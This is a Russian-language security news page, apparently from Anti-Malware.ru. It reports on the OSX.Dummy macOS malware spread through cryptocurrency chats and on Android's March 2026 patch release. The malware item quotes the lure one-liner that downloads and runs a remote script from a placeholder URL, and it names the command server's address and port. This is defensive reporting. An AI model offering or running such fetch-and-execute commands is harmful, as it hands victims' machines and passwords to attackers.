Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Google закрыла 129 уязвимостей в Android, включая уже используемую 0-day

Google выпустила мартовский набор патчей для Android, получившийся одним из самых масштабных за последнее время. В общей сложности закрыто 129 уязвимостей в самой ОС и компонентах сторонних поставщиков. Патчи традиционно разбиты на два набора — 2026-03-01 и 2026-03-05.

Такой подход позволяет производителям устройств сначала закрыть критические проблемы в самой платформе Android, а затем обновить драйверы.

Самый тревожный пункт в списке — CVE-2026-21385. Это уязвимость в компоненте Display/Graphics от Qualcomm. Google прямо указывает, что есть признаки её эксплуатации в реальных кибератаках.

Проблема связана с целочисленным переполнением и может привести к повреждению памяти. Уязвимости в графических подсистемах нередко используются для обхода механизмов защиты и компрометации устройства.

Но этим дело не ограничивается. В мартовском наборе есть и другие важные патчи. Например, для CVE-2026-0006, которая находится в системном компоненте Android, позволяя удалённо выполнить код без участия пользователя и без дополнительных прав. Теоретически это даёт атакующему возможность полностью захватить устройство.

Также устранена критическая уязвимость (CVE-2025-48631), которая могла удалённо «положить» устройство. В ядре Android закрыто несколько проблем повышения привилегий, в том числе в Flash-Friendly File System, гипервизоре и pKVM. Такие баги позволяют локальному злоумышленнику получить полный системный доступ.

Отдельный блок касается аппаратных компонентов. Помимо Qualcomm, патчи затрагивают Arm (Mali GPU), Imagination Technologies (PowerVR), MediaTek и Unisoc.

Пользователям и корпоративным администраторам рекомендуется установить обновления как можно скорее, как только они станут доступны от производителя устройства. Особенно это важно на фоне подтверждённой эксплуатации одной из уязвимостей.

RSS: Новости на портале Anti-Malware.ru